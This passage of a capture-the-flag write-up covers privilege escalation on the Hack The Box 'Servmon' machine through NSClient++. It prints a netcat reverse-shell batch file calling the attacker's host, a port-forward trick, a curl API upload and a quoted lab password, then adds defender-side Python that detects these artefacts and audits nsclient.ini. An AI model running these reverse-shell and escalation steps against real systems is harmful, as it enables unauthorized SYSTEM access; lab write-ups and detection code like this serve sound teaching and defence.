As per the searchsploit results, read through the exploit. We first need to make the NSClient++ web app reachable. Since nsclient.ini only allows 127.0.0.1 to log in, we set up a remote port forward (ssh -R) from the target back to Kali: connections to Kali’s port 8443 are relayed to the target’s loopback port 8443, so the service sees them as coming from localhost rather than from a remote host.

nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>ssh -l root -R 8443:127.0.0.1:8443 root@10.10.14.18
The authenticity of host '10.10.14.18 (10.10.14.18)' can't be established.
ECDSA key fingerprint is SHA256:HRvXIeB7FuR8syEm3D1KDRx6s3O7n4jJQmXw4ald9PA.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.14.18' (ECDSA) to the list of known hosts.
root@10.10.14.18's password:
Linux Kali 4.19.0-kali5-amd64 #1 SMP Debian 4.19.37-2kali1 (2019-05-15) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Sun Aug 30 13:15:05 2020 from 192.168.92.1
root@Kali:~# 

Then we can run the browser (Chromium works better than Firefox here).

root@Kali:~/HTB/Servmon# chromium --no-sandbox

Navigate to https://localhost:8443 on Kali (note the HTTPS) and log in with the password from nsclient.ini (ew2x6SsGTxjRwXOT).

Go to settings -> external scripts -> scripts -> Add new

The “key” field needs to be command and the value needs to be a path to an executable or batch script serving as the payload. In this case we can create a simple .bat file with the following (after downloading nc.exe to the target):

nadine@SERVMON C:\Users\Nadine\Downloads>echo @echo off > evil.bat
nadine@SERVMON C:\Users\Nadine\Downloads>echo C:\Users\Nadine\Downloads\nc.exe 10.10.14.18 443 -e cmd.exe >> evil.bat

nadine@SERVMON C:\Users\Nadine\Downloads>type evil.bat
@echo off
C:\Users\Nadine\Downloads\nc.exe 10.10.14.27 443 -e cmd.exe 

IppSec explains in his video that the Key and Value fields are simply a new key/value pair for each external scripts entry. For example, in the default script we see these blank fields:

Adding key=command, value=C:\path\to\evil.bat results in a new field with command=C:\path\to\evil.bat

Once done, the NSClient++ service needs to be restarted. This can be done from the Web GUI

or from cmd:

nadine@SERVMON C:\Users\Nadine\Downloads>sc stop nscp

SERVICE_NAME: nscp
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x2
        WAIT_HINT          : 0x0

nadine@SERVMON C:\Users\Nadine\Downloads>sc query nscp

SERVICE_NAME: nscp
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

nadine@SERVMON C:\Users\Nadine\Downloads>sc start nscp

SERVICE_NAME: nscp
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x1
        WAIT_HINT          : 0xbb8
        PID                : 6324
        FLAGS              :

Strangely, when I attempted to stop/restart the service the way the documentation intended, it didn’t work:

nadine@SERVMON C:\Program Files\NSClient++>nscp service --stop
ERROR: Service failed to stop: OpenSCManager failed: 5: Access is denied.

nadine@SERVMON C:\Program Files\NSClient++>nscp service --restart
ERROR: Service failed to stop: OpenSCManager failed: 5: Access is denied.

ERROR: Service failed to start: OpenSCManager failed: 5: Access is denied.

Hopefully the service will not hang when restarted. When done, go to Queries and you’ll see that your script is there (the default one may not be present);

click on it, then go to the Run tab.

When you run it you’ll get a SYSTEM shell, provided you have a listener up and running:

root@Kali:~/HTB/Servmon# rlwrap -r nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.27] from (UNKNOWN) [10.10.10.184] 54975
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami & ipconfig
whoami & ipconfig
nt authority\system

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : dead:beef::f00a:6ae5:a0c:f944
   Temporary IPv6 Address. . . . . . : dead:beef::519b:a6b9:e1fd:4b16
   Link-local IPv6 Address . . . . . : fe80::f00a:6ae5:a0c:f944%3
   IPv4 Address. . . . . . . . . . . : 10.10.10.184
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:9078%3
                                       10.10.10.2

C:\Program Files\NSClient++>
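The shell above is a child of nscp.exe running as SYSTEM, reached by way of an ssh -R tunnel, an sc stop/start of the agent by a normal user, and nc.exe -e. As an added defender-side example (my code, not from the box, NSClient++ or IppSec), the following Python triages constructed Sysmon-style process-creation events for exactly those four artefacts. The field names (ProcessId, Image, ParentImage, CommandLine, User) are an assumption modelled on Sysmon Event ID 1, and every event record below is made up.

```python
"""Triage constructed process-creation events for the artefacts this escalation leaves behind."""
import ntpath
import shlex
from typing import Dict, List, Tuple

SHELLS = {"cmd.exe", "powershell.exe", "nc.exe", "ncat.exe"}
NETCAT = {"nc.exe", "ncat.exe"}

# Constructed events, not telemetry from the box. The field names mirror Sysmon
# Event ID 1 (ProcessId, Image, ParentImage, CommandLine, User); that mapping is an assumption.
EVENTS: List[Dict[str, str]] = [
    {"ProcessId": "6324", "Image": r"C:\Program Files\NSClient++\nscp.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r'"C:\Program Files\NSClient++\nscp.exe"', "User": r"NT AUTHORITY\SYSTEM"},
    {"ProcessId": "7001", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\NSClient++\nscp.exe",
     "CommandLine": r"cmd.exe /c C:\Users\Nadine\Downloads\evil.bat", "User": r"NT AUTHORITY\SYSTEM"},
    {"ProcessId": "7002", "Image": r"C:\Users\Nadine\Downloads\nc.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Users\Nadine\Downloads\nc.exe 10.10.14.27 443 -e cmd.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"ProcessId": "5120", "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"ssh -l root -R 8443:127.0.0.1:8443 root@10.10.14.18", "User": r"SERVMON\Nadine"},
    {"ProcessId": "5130", "Image": r"C:\Windows\System32\sc.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"sc stop nscp", "User": r"SERVMON\Nadine"},
    {"ProcessId": "3001", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe", "User": r"SERVMON\Nadine"},
]


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host thanks to ntpath)."""
    return ntpath.basename(path).lower()


def _argv(cmd: str) -> List[str]:
    """Split a Windows command line on whitespace, honouring double quotes."""
    try:
        return [a.strip('"') for a in shlex.split(cmd, posix=False)]
    except ValueError:              # unbalanced quote: fall back to a plain split
        return cmd.split()


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule, ProcessId) pairs for every event that matches a rule, in input order."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        image, parent = _base(ev["Image"]), _base(ev["ParentImage"])
        argv = _argv(ev["CommandLine"])
        user = ev["User"].upper()
        pid = ev["ProcessId"]
        # Rule 1: the monitoring agent itself launching a shell. Legitimate checks run
        # scripts too, so tune this against the agent's known scripts; cmd.exe /c on a
        # file under a user profile is not one of them.
        if parent == "nscp.exe" and image in SHELLS:
            hits.append(("nscp_spawns_shell", pid))
        # Rule 2: netcat asked to attach a program to the socket (-e), whoever launched it.
        if image in NETCAT and "-e" in argv[1:]:
            hits.append(("netcat_exec_redirect", pid))
        # Rule 3: an outbound ssh session opening a reverse tunnel (-R), which is how a
        # loopback-only service becomes reachable from another host.
        if image == "ssh.exe" and any(a.startswith("-R") for a in argv[1:]):
            hits.append(("ssh_reverse_tunnel", pid))
        # Rule 4: a non-SYSTEM account stopping or starting the agent service.
        if (image == "sc.exe" and len(argv) >= 3 and argv[1].lower() in {"stop", "start"}
                and argv[2].lower() == "nscp" and not user.endswith("\\SYSTEM")):
            hits.append(("agent_service_cycled_by_user", pid))
    return hits


if __name__ == "__main__":
    for rule, pid in triage(EVENTS):
        print(f"{rule:32s} pid={pid}")
```

Rule 1 is the one worth keeping even if the others are noisy: the agent should only ever run the scripts an administrator shipped with it, so any shell it spawns that points at a user-writable path is a direct signal. Rule 4 matters because a plain user account should not be able to cycle the monitoring service at all; that it could here is part of why the restart step worked.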

Upload evil.bat via API

If you find the above too confusing (because the Web GUI sucks), you’re not alone. The upload can also be done with API calls. I did it this way:

root@Kali:~/HTB/Servmon# cat evil.bat 
@echo off
C:\Users\Nadine\Downloads\nc.exe 10.10.14.40 443 -e cmd.exe

root@Kali:~/HTB/Servmon# curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/evil.bat --data-binary @evil.bat
Enter host password for user 'admin':
Added evil as scripts\evil.bat

Unfortunately I couldn’t find a way to trigger the script via the API, even though there is a command execute API, so here you have to log in, and you’ll see this in Queries

I didn’t have to add it to the scheduler or anything; clicking Queries should run the .bat file, and if not, clicking its entry under Queries should.
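Both routes above, the key=command entry added through the web GUI and the PUT under “Upload evil.bat via API”, end up as an entry in the external scripts section of nsclient.ini, next to the plaintext password and the allowed hosts line that started all this. As an added defender-side example (my code, not from the box, NSClient++ or IppSec), here is a small Python audit that parses a constructed nsclient.ini and reports the settings that made this path possible. The section and key names follow the NSClient++ ini layout as I know it and are assumptions; the baseline of expected script names (check_uptime), the sample values and the placeholder password are all made up.

```python
"""Audit an nsclient.ini for the settings that let an external script run as SYSTEM."""
import configparser
import shlex
from typing import Dict, List, Optional, Set

# Constructed sample, not the box's real nsclient.ini. Section and key names follow the
# NSClient++ ini layout as I know it; treat them as assumptions. The password is a placeholder.
SAMPLE_INI = r"""
[/modules]
CheckExternalScripts = enabled
WEBServer = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = PLACEHOLDER-PASSWORD

[/settings/external scripts/scripts]
check_uptime = scripts\check_uptime.bat
command = C:\Users\Nadine\Downloads\evil.bat
evil = scripts\evil.bat
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}
# Locations an administrator deliberately ships scripts from (assumed install path).
TRUSTED_PREFIXES = ("scripts\\", "c:\\program files\\nsclient++\\")
# Script names the administrator knows they configured (assumed baseline).
EXPECTED_SCRIPTS = frozenset({"check_uptime"})


def _section(cp: configparser.ConfigParser, name: str) -> Dict[str, str]:
    return dict(cp[name]) if cp.has_section(name) else {}


def _executable(command_line: str) -> str:
    """First token of a command line with surrounding quotes removed."""
    try:
        parts = shlex.split(command_line, posix=False)
    except ValueError:
        parts = command_line.split()
    return parts[0].strip('"') if parts else ""


def audit_nsclient_ini(text: str, expected: Optional[Set[str]] = None) -> List[str]:
    """Return a list of findings, most severe aspects of the config first."""
    expected = set(EXPECTED_SCRIPTS if expected is None else expected)
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.optionxform = str            # keep key case as written (CheckExternalScripts, WEBServer)
    cp.read_string(text)
    findings: List[str] = []

    modules = _section(cp, "/modules")
    if (modules.get("CheckExternalScripts", "").lower() == "enabled"
            and modules.get("WEBServer", "").lower() == "enabled"):
        findings.append("high: CheckExternalScripts and WEBServer are both enabled, so a web "
                        "login is enough to register and run a script as the service account")

    defaults = _section(cp, "/settings/default")
    if defaults.get("password"):
        findings.append("high: cleartext password in /settings/default; whoever can read "
                        "nsclient.ini can log in, so restrict the file's ACL")
    hosts = [h.strip() for h in defaults.get("allowed hosts", "").split(",") if h.strip()]
    remote = [h for h in hosts if h not in LOOPBACK]
    if remote:
        findings.append("medium: allowed hosts permits remote access from " + ", ".join(remote))
    elif hosts:
        findings.append("info: allowed hosts is loopback-only, which a local user defeats with "
                        "a port forward; it does not substitute for the file ACL")

    # Each entry here is a name = command line pair; that is what key=command adds.
    for name, cmd in _section(cp, "/settings/external scripts/scripts").items():
        exe = _executable(cmd)
        if not exe.lower().startswith(TRUSTED_PREFIXES):
            findings.append(f"high: external script '{name}' runs {exe}, outside the agent's "
                            "script directory")
        elif name not in expected:
            findings.append(f"medium: unexpected external script '{name}' ({exe}) is not in "
                            "the baseline")
    return findings


if __name__ == "__main__":
    for line in audit_nsclient_ini(SAMPLE_INI):
        print(line)
```

The baseline check is there because the API route does not trip the path check: a script uploaded with the PUT lands inside the agent’s own scripts directory, so only a comparison against the names an administrator expects catches it. Run the audit against the live file with the agent’s real script list as the baseline, and pair it with an ACL that keeps nsclient.ini unreadable to ordinary users; on this box that readability, not the loopback restriction, was the weak point.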